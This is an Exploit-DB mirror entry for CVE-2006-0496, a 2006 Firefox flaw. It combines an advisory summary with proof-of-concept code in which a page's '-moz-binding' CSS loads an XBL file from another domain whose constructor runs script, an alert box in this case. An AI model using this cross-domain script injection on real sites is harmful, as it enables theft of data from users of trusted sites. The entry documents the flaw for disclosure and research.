- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 27150
- Проверка EDB
-
- Пройдено
- Автор
- CHRIS THOMAS
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2006-0496
- Дата публикации
- 2006-01-30
Код:
source: https://www.securityfocus.com/bid/16427/info
Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.
The issue affects the '-moz-binding' property.
This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information.
http://domain1/path/to/page.html :
<html>
<head>
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>
http://domain2/path/to/xbl.xml :
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>
</bindings>- Источник
- www.exploit-db.com
